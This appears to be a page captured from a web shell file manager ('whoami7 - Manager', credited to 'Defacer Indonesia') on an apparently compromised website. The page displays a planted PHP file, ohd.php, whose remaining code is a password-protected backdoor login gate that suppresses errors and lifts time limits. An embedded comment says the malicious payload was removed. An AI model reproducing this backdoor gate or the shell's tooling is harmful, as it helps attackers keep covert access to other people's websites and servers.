whoami7 - Manager
:
/
home
/
logoandw
/
naturallights.us
/
user
/
Upload File:
files >> /home/logoandw/naturallights.us/user/ohd.php
<?php $password = '0c77b9949b3f9c2db133ee7db2620b99'; error_reporting(0); set_time_limit(0); session_start(); if (!isset($_SESSION['loggedIn'])) { $_SESSION['loggedIn'] = false; } if (isset($_POST['password'])) { if (md5($_POST['password']) == $password) { $_SESSION['loggedIn'] = true; } } if (!$_SESSION['loggedIn']): ?> <html><head><title> </title></head> <body> <p align="center"><center><font style="font-size:13px" color="#008000" face="Trebuchet MS"> <form method="post">(yanz) <input type="password" name="password"> <input type="submit" name="submit" value=" >>"> </form> </body> </html> <?php exit(); endif; ?> <?php /** * Note: This file may contain artifacts of previous malicious infection. * However, the dangerous code has been removed, and the file is now safe to use. */ ?>
Copyright ©2021 || Defacer Indonesia